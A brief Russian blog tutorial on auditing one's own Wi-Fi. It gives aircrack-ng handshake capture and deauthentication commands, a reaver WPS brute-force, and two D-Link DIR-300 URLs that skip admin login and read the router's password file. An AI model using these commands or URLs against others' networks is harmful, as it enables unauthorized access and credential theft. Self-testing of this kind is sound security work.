Тестирование WI-FI сетей на уязвимости

Приветствую! Сразу оговорюсь, что данный материал не является руководством к действию и предназначен исключительно для тестирования собственных точек доступа WI-FI. Как показывает практика, проверку удобнее всего проводить помощью специализированного ПО такого как  BackTrack или его современного последователя Kali Linux.

Первым делом убеждаемся в наличии сетевого интерфейса, ставим его на мониторинг и просматриваем все доступные сети:

ifconfig
airmon-ng start wlan0
airodump-ng wlan0mon

Затем мы можем сузить область сканирования, указав параметры для нашей конкретной точки доступа:

airodump-ng wlan0mon -o pcap -w ssidname --bssid D1:FB:12:15:45:DE -c 2

Проводим деаунтефикацию, чтобы зафиксировать хендшейк:

aireplay-ng -0 10 -a D1:FB:12:15:45:DE -c 45:3B:14:55:49:9A wlan0mon

Полученный файл хендшейка сканируем самостоятельно по словарям или отправляем на онлайн-сервис, такой как  XSRC.RU. Всё, ждем сможет ли сервис подобрать пароль. Если пароль подобран, значит он слишком простой и его необходимо в срочном порядке менять!

Также возможен взлом из-за включенной функции WPS на роутере. Последовательность проверки в Kali Linux следующая:

sudo airmon-ng start wlan0
sudo airodump-ng wlan0mon
sudo wash -i wlan0mon
sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -vv

Будьте внимательны, если у вас роутер модели D-Link DIR-300, то на нем на некоторых прошивках присутствует возможность входа в админку (веб-интерфейс) без пароля:

http://192.168.0.1/bsc_internet.php?NO_NEED_AUTH=1&AUTH_GROUP=0
http://192.168.0.1/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd

 

Категории: Безопасность

Комментирование отключено